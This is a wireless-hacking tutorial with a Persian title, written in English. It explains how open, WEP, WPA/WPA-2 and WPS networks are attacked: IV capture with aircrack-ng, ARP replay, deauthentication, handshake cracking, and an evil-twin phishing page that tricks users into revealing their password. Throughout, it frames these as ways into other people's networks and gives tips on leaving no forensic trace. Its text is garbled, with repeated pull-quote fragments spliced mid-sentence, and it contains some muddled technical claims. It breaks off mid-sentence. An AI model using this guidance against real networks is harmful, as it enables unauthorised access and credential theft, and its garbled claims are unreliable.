آموزش هک بیسیم (wireless)
Hidden networks offer a real challenge to a hacker.
• What are the different flavors of wireless networks you’ll encounter and how difficult it is to hack each of them. •What are hidden networks, and whether they offer a real challenge to a hacker. • You’ll have a rough idea how each of the various ‘flavors’ of wireless networks is actually hacked. (The last point would be covered in details in the next chapter) Wireless Security Levels Below is a simple list of points I use to explain various possible security implementations that a
wireless network may have. Suppose you are the owner of a club. There can be many possible scenarios as far as entry to the club is concerned : • Open Entry • Open networks- They don’t require passwords to • connect to the wireless router (access point). 1 Open entry and unrestricted usage – Anyone can walk right in. They have unrestricted access to the dance floor, free beer, etc. 2 This is open network. This is only used in public places (restaurants, etc.) which offer free Internet access to it’s users (WiFi hotspots) . It’s fairly uncommon to find such networks. Wireless hacking usually refers to cracking the router’s password. 3 Open entry but restricted usage. Anyone can walk right in, but have to pay for drinks. For the router’s security purposes, this is also an open network. However, connecting to the wireless router (entering the club) doesn’t guarantee you unlimited access to the internet. There is another
layer of authentication. These are seen in public places (airports, restaurants, fast food joints, shopping malls) where they let you connect to the wireless network without any password, but after that you have an additional layer between you and the internet. This layer usually restricts your ability to access the internet (either by bandwidth or by time). This layer can be used to charge you for the amount of data you use. The point to note in the discussion above is that wireless hacking usually refers to cracking the router’s password. The additional layer which might be present between you and the internet after you login is something you’ll have to deal with separately, and is not covered under wireless hacking. So, from wifi hacking perspective, both the networks above are the same, “open”, and do not require any hacking.
• Stupidly Guarded Entry (WEP)
• ISPs may require users to login to
• their accounts to access the internet.
1P assword at door and unrestricted access. For a person who has Kali Linux installed on his machine, hacking tof a WEP wireless network might be a matter of minutes.
The member of the club pay a certain amount every month, and get access to free drinks. They have to say the password at the shady looking entrance to the club. Unfortunately, it’s quite easy for anyone to overhear the password and get in. This is WEP protected network. For a person who has Kali Linux installed on his machine, hacking this kind of wireless network is a matter of minutes. These are easy targets. However, nowadays it’s fairly uncommon to find WEP protected networks, because of the ease with which they can be hacked into. WPA and WPA-2 are more common. 2 Password at door but restricted access. Only members can enter, but they still have to pay for their drinks. This is the case when the
network has password and an additional layer to get access to the internet. This is common in three cases: – Colleges often allocate student’s IDs and
– Passwords using which students can access
– Internet facilities offered by the institute
1 ISP requires login – Many ISP’s require users to login to their account to access the internet. Often logging in provides an interface which lets the users see their bandwidth usage, details of their network plan, etc.
2 Colleges/ Schools/ Offices – Many institutes provide users accounts which they use to access the institutes’ network.
Bruteforce attacks may take forever (literally) depending on the length of the password. Again, from the wireless hacking perspective, both the networks above are “WEP protected”, and
are rather simple to hack into. Well Guarded Entry As far as the bifurcation into whether or not another layer of authentication is present once you
have the wireless network password is concerned, WEP and WPA cases are the same. The only difference is that the college wireless routers have WPA instead of WEP Thus, this doesn’t merit further discussion. However, there’s another subcategory in this that we will discuss. 1 Fingerprint and retinal scan for entry – The entry to this club is secure enough for most
purposes. Getting past this level of security takes a lot of time and efforts. Theoretically, if you’re willing to do what it takes, you may still get it. But a heist (if I may call it that) of this magnitude will take a lot of planning, and even then, a lot depends on sheer luck. This is WPA secure network. The only way to crack this network with dictionary or bruteforce attacks. Bruteforce attacks may take forever (literally) depending on the length of the password, and dictionary attacks too will take days/weeks depending on size of dictionary, and still may fail (if the password is WPS has a vulnerability which allows a hacker to get a password in around 3 hours. not in the dictionary). [More on this later]. So if you want to crack the password of a WPA network… get a new hobby. 2 Fingerprint and retinal scan for entry, and a card which you can quickly swipe to avoid standing in a queue since the aforementioned scans take some time – By introducing this card the club created an alternate path for entry. While this saves time for the legitimate users, the card can be stolen. While it’s not as easy as overhearing the password (WEP), or walking right in (open). This is WPA with WPS enabled. WPS has a vulnerability which allows a hacker to get a password in around 3 hours (can be more sometimes, up to 10-12 hours, but that figure is nothing compared to WPA). Just like WEP, WPS is now a well known weak point and new routers have either disabled WEP or added some measures (like rate limiting) which make it really hard to, well, pickpocket the members. Bonus : Hidden entry Any of the above clubs could have a secret entrance. Sounds cool, right? This is somewhat similar to what we call “Security Through Obscurity”. How we you get in if you don’t know where the club’s entrance is? Well, while you don’t know where the club entrance is, you know where the club is. You have two options 1 Passive method – You go to the roof of a nearby building, take your binoculars out, and try to find out how people enter the building. In wireless terms, you wait till a client connects to the network. This may take a lot of time, but it’s relatively safer from a forensic viewpoint (by not doing anything, just watching patiently, you ensure that you don’t leave any clues behind which may later be used to catch you). Hidden networks don’t really offer much protection to a network, and a WEP protected hidden network just means that instead of 10 mins it will take 15 mins to get the password.
2 Active method – You cut off the electric/water supply to the building, or maybe somehow trigger the fire alarm. One way or the other, force the members to get out of the club. Once they find out that everything is fine, they’ll swarm back in. You will know where the gate is. In wireless terms, you can de-authenticate the clients (you’ll be doing this often, whether you’re hacking a WEP network, or getting a WPA handshake [again, more on this later]). Off course, this method results in you leaving behind some traces, but at least you don’t have to wait for hours. The analogue of hidden entry clubs are hidden networks. As long as the network has clients, it’s quite easy to find out the name of the network (SSID to be precise, setting the network to hidden basically stops the access point from revealing it’s SSID). However, when a client connects to the network, beacon frames (date packets) with SSID (in clear-text, i.e. unencrypted) are transmitted, which you can capture and get the SSID of the network. So, hidden networks don’t really offer much protection to a network, and a WEP protected hidden network just means that instead of 10 mins it will take 15 mins to get the password. For a WPA network, making the SSID hidden doesn’t really do a lot since WPA networks are practically uncrackable and a person who has the time and processing power to get past WPA encryption won’t be stopped by the hidden SSID. Summary There can be additional authentication steps (logins) or other barriers between you and internet even after you get access to the router. However, this is an entirely separate problem Wireless hotspots or open networks don’t have any encryption. and not too relevant to the discussion of wireless hacking. Still it’s something you must be aware of:
◦ Wireless hotspots or open networks don’t have any encryption. They can be accessed by anyone. Also, the data transmitted by you is not encrypted and can be read by anyone in the vicinity. Anything which you send to the destination server in plain-text (say, to google), will be transmitted from your machine to the wireless router in plain-text. Anyone in the vicinity can easily read it using Wireshark or any other similar tool. Of course, sensitive data is rarely sent in plain-text, so don’t sit around wireless hotspots hoping to get someone’s FB login credentials. However, lack of encryption in open networks should be considered seriously. As far as wireless hacking is concerned, not a lot to do here (other than sniffing at unencrypted data in the air).
WEP – This is where most of the stuff happens. Countless vulnerabilities, countless attacks, countless research papers listing the issues, countless tools to get the passwords. It doesn’t take too much effort to learn how to hack these. If you are familiar with linux, then it takes practically no efforts at all. Just some terminal commands, and you’re done (with wifite you don’t even have to bother with that).
◦ WPA – Don’t want to mess with this guy. Theoretically there’s a way to get in. Practically it will take forever. Dictionary attacks and bruteforce are the methods to get in. Will cover all this in the advanced version of this guide. PS: When I say WPA, I refer to both WPA and WPA-2. For the sake of this chapter, they are the same. WPA with WPS : not as easy as WEP, but still do-able.
◦ WPA with WPS – Tough guy with a weak spot. Hit him where it hurts and the ‘it takes forever to get in’ becomes a matter of hours. Not as easy as WEP, but still do-able. Unfortunately, you might encounter a guy who has a weak spot but has started learning his lessons and guards that spot properly (WPS but with rate-limiting or some other security measure).
I hope you now have a general idea about the various flavors of wireless security. I have a few advanced guides in mind too, which will touch the cryptographic specifics about these ‘flavors’, the vulnerabilities, and their exploits. As far as the practical hacking process is concerned, there are plenty of tutorials here on this website and elsewhere on the internet regarding that, so I am not covering that again. I hope that this time when you read a guide you are aware of what’s going on, and don’t end up trying an attack that works on WEP targets on a WPA network. Pre-requisites
You should know (all this is covered in Wireless Hacking basics):
• What are the different flavors of wireless networks you’ll encounter and how difficult it is to hack each of them.
• What are hidden networks, and whether they offer a real challenge to a hacker.
• Have a very rough idea how each of the various ‘flavors’ of wireless networks is actually hacked. Post-reading
You will know:
• Know even more about different flavors of wireless networks.
• How to go about hacking any given wireless network. WEP: the main problems were static keys and weak IVs.
• Common tools and attacks that are used in wireless hacking. The last two points would be covered in detail in the coming chapters. A rough idea about the
cryptographic aspects of the attacks, the vulnerabilities and the exploits. A rough idea about the cryptographic aspects of each ‘flavor’ of wireless network security.
WEP, WPA and WPA-2 WEP : the aim of Wireless Alliance was to write an algorithm to make wireless network (WLAN) as secure as wired networks (LAN). This is why the protocol was called Wired Equivalent Privacy (privacy equivalent to the one expected in a traditional wired network). Unfortunately, while in theory the idea behind WEP sounded bullet-proof, the actual
implementation was very flawed. The main problems were static keys and weak IVs. For a while attempts were made to fix the problems, but nothing worked well enough (WEP2, WEP plus, etc. were made but all failed). WPA was a new WLAN standard which was compatible with devices using WEP encryption. It fixed pretty much all the flaws in WEP encryption, but the limitation of having to work with old hardware meant that some remnants of the WEPs problems would still continue to haunt WPA. Overall, however, WPA was quite secure. In the above story, this is the remodeled ship. Very few tools exist which carry out the attacks against WPA networks properly. WPA-2 is the latest and most robust security algorithm for wireless networks. It wasn’t backwards compatible with many devices, but these days all the new devices support WPA-2. This is the invincible ship, the new model with a stronger alloy. But wait…
In last chapter we assumed WPA and WPA-2 are the same thing. In this one, I’m telling you they are quite different. What’s the matter? Well actually, the two standards are indeed quite di fferent. However, while it’s true there are some remnant flaws in WPA that are absent in WPA-2, from a hacker’s perspective, the technique to hack the two networks is often the same. Why?
• Very few tools exist which carry out the attacks against WPA networks properly (the absence of proof-ofconcept scripts means that you have to do everything from scratch, which most people can’t).
• All these attacks work only under certain conditions (key renewal period must be large, QoS must be enabled, etc.) Because of these reasons, despite WPA being a little less secure than WPA-2, most of the time, a hacker has to use bruteforce/dictionary attack and other methods that he would use If you don’t want to leave behind any footprints, then passive method is the way to go. against WPA-2, practically making WPA and WPA-2 the same thing from his perspective. PS: There’s more to the WPA/WPA-2 story than what I’ve captured here. Actually WPA or WPA-2 are ambiguous descriptions, and the actual intricacy (PSK, CCMP, TKIP, X/EAP, AES w.r.t. cipher used and authentication used) would required further diving into personal and enterprise versions of WPA as well as WPA-2. How to Hack Now that you know the basics of all these network, let’s get to how actually these networks are hacked. I will only name the attacks, further details would be provided in coming tutorials WEP The Initialization vector v passed to the RC4 cipher is the weakness of WEP. Most of the attacks rely on inherent weaknesses in IVs (initialization vectors). Basically, if you collect enough of them, you will get the password.
1 Passive method
◦ If you don’t want to leave behind any footprints, then passive method is the way to go. In this, you simply listen to the channel on which the network is on, and capture the data packets
(airodump-ng). These packets will give you IVs, and with enough of these, you can crack the network (aircrack-ng). I already have a tutorial on this method, which you can read here – Hack WEP using aircrack-ng suite. One of the best ways to do this is by requesting ARP packets.
2 Active methods
◦ ARP request replay The above method can be incredibly slow, since you need a lot of packets (there’s no way to say how many, it can literally be anything due the nature of the attack. However, usually the number of packets required ends up in 5 digits). Getting these many packets can be time consuming. However, there are many ways to fasten up the process. The basic idea is to initiate some sort of conversation in the network, and then capture the packets that arise as a result of the conversation. The problem is, not all packets have IVs. So, without having the password to the AP, you have to make it generate packets with IVs. One of the best ways to do this is by requesting ARP packets (which have IVs and can be generated easily once you have captured at least one ARP packet). This attack is called ARP replay attack. We have a tutorial for this attack as well, ARP request replay attack.
◦ Chopchop attack
◦ Fragmentation attack
◦ Caffe Latte attack
WPA-2 (and WPA)
There are no vulnerabilities here that you can easily exploit. The only two options we have are to guess the password or to fool a user into giving us the password. What to guess a
password? You need the capture the series of packets transmitted when a valid client connects to the AP. 1 Guess the password – For guessing something, you need two things : Guesses and validation. Basically, you need to be able to make a lot of guess, and also be able to verify if they are correct or not. The naive way would be to enter the guesses into the password field that your OS provides when connecting to the wifi. That would be slow, since you’d have to do it manually. Even if you write a script for that, it would take time since you have to communicate with the AP for every guess(that too multiple times for each guess). Basically, validation by asking the AP every time is slow. So, is there a way to check the correctness of our password without asking the AP? Yes, but only if you have a 4-way handshake. Basically, you need the capture the series of packets transmitted when a valid client connects to the AP. If you have these packets (the 4-way handshake), then you can validate your password against it. More details on this later, but I hope the abstract idea is clear. There are a few different ways of guessing the password.
◦ Bruteforce – Tries all possible passwords. It is guaranteed that this will work, given sufficient time. However, even for alphanumeric passwords of length 8, bruteforce takes incredibly long. This method might be useful if the password is short and you know that it’s composed only of numbers.
◦ Wordlist/Dictionary – In this attack, there’s a list of words which are possible candidates to be the password. These word list files contains english words, combinations of words, misspelling of words, and so on. There are some huge wordlists which are many GBs in size, and many networks can be cracked using them. However, there’s no guarantee that the network you are trying to crack would have it’s password A possible solution to password cracking is to create a wordlist/dictionary that can also convert the plaintext
passwords into hashes so that they can be checked directly. in the list. These attacks get completed within a reasonable timeframe.
◦ Rainbow table – The validation process against the 4-way handshake that I mentioned earlier involves hashing of the plaintext password which is then compared with the hash in handshake. However, hashing (WPA uses PBKDF2) is a CPU intensive task and is the limiting factor in the speed at which you can test keys (this is the reason why there are so many tools which use GPU instead of CPU to speed up cracking). Now, a possible solution to this is that the person who created the wordlist/dictionary that we are using can also convert the plaintext passwords into hashes so that they can be checked directly. Unfortunately, WPA-2 uses a salt while hashing, which means that two networks with the same password can have different hashing if they use different salts. How does WPA-2 choose the salt? It uses the network’s name (SSID) as the salt. So two networks with the same SSID and the same password would have the same salt. So, now the guy who made the wordlist has to create separate hashes for all possible SSID’s. Practically, what happens is that hashes are generated for the most common SSID’s (the default one when a router is purchases like -linksys, netgear, belkin, etc.). If the target network has one of those SSID’s then the cracking time is reduced significantly by using the precomputed hashes. This precomputed table of hashes is called rainbow table. Note that these tables would be significantly larger than the wordlists tables. So, while we saved ourselves some time while cracking the password, we had to use a much larger file (some are 100s of GBs) instead of a smaller one. This is referred to as time-memory tradeoff. This file has rainbow tables for 1000 most common SSIDs. Force your victm to connect to a fake open network that you create, and then send him a login page in his browser where you ask him to enter the password of the network. 2 Fool a user into giving you the password. Basically this just a combination of Man in the middle attacks and social engineering attacks. More specifically, it is a combination of evil twin and phishing. In this attack, you first force a client to disconnect from the original WPA-2 network, then force him to connect to a fake open network that you create, and then send him a login page in his browser where you ask him to enter the password of the network. You might be wondering, why do we need to keep the network open and then ask for the password in the browser (can’t we just create a WPA-2 network and let the user give us the password directly). The answer to this lies in the fact that WPA-2 performs mutual authentication during the 4-way handshake. Basically, the client verifies that the AP is legit, and knows the password, and the AP verifies that the client is legit and knows the password (throughout the process, the password is never sent in plaintext). We just don’t have the information necessary enough to complete the 4- way handshake.
3 Bonus : WPS vulnerability and reaver [I have covered it in detail separately so not explaining it again (I’m only human, and a very lazy one too)] The WPA-2 4 way handshake procedure. Both AP and the client authenticate each othe